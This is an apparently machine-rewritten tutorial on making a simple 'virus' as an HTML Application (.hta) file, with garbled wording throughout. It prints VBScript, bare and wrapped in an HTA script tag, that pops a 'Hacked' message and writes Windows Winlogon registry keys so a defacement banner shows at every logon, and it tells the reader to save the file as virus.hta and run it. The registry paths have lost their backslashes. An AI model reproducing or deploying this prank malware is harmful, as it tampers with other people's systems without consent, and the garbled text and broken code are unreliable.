
Setting up a virus seriously isn't limited by easy use in *.EXE, *.BAT, *.VBS or course. Ends up there other extensions which might be useful to produce a virus, namely *.hta or HTML Application.
Basically how to make simple the herpes simplex virus using this extension a lot like VBScript, it will only take two lines of code which is placed before you start and end of an line figure on the virus.
For examples using VBS
Dim regkey
Set regkey = CreateObject("Wscript.Shell")
MsgBox "Hacked...!!!", vbCritical, "Warning"
regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeText", "z0y4 was here"
regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeCaption", "Warning"
self.close
If using hta it'll be this way
<script type="text/vbscript">
Dim regkey
Set regkey = CreateObject("Wscript.Shell")
MsgBox "Hacked...!!!", vbCritical, "Warning"
regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeText", "z0y4 was here"
regkey.regwrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindows NTCurrentVersionWinlogonLegalNoticeCaption", "Warning"
self.close
</script>
Save the above mentioned code with extension *. hta, by way of example virus.hta then open the file.
the point is to include code <script type="text/vbscript"> front of the line and </script> right at the end from the line.
Good luck.



